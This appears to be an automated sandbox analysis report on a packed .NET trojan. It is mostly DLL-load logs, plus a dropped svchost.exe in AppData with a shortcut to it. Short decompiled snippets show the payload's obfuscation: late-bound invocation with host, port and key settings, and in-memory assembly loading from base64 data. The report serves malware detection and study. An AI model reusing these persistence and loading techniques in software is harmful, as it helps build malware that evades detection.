              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: svchost.lnk.0.drLNK file: ..\..\..\..\..\..\Local\svchost.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: System.pdb0G source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Xml.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.ni.pdbRSDS source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: ConsoleApp8.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: ConsoleApp8.pdb` source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Configuration.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Xml.pdbSystem.Core.dll source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Configuration.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Xml.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Core.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Numerics.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4308872762.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, WER1E43.tmp.dmp.26.dr
              Source: Binary string: Microsoft.VisualBasic.pdbH$jS source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Management.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: mscorlib.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Management.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Core.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: C:\Users\clien\Desktop\projeto6\ConsoleApp8\obj\Debug\ConsoleApp8.pdb. source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.dr
              Source: Binary string: HPbn0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4331475165.000000000604B000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5 source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4327200255.0000000005BC6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Numerics.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.ni.pdb source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: C:\Users\clien\Desktop\projeto6\ConsoleApp8\obj\Debug\ConsoleApp8.pdb source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, svchost.exe.0.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER1E43.tmp.dmp.26.dr
              Source: Binary string: System.Numerics.pdb" source: WER1E43.tmp.dmp.26.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, Helper.cs.Net Code: XMemory System.AppDomain.Load(byte[])
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 20.2.svchost.exe.391c344.1.raw.unpack, Messages.cs.Net Code: Memory
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, Helper.cs.Net Code: XMemory System.AppDomain.Load(byte[])
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 20.2.svchost.exe.39471b0.2.raw.unpack, Messages.cs.Net Code: Memory
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, Helper.cs.Net Code: XMemory System.AppDomain.Load(byte[])
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 20.2.svchost.exe.19f0000.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeStatic PE information: 0xCBCC6AB0 [Sat May 7 17:51:44 2078 UTC]
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeCode function: 0_2_02893E9A push esp; ret 0_2_02893EA1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0496633D push eax; ret 2_2_04966351
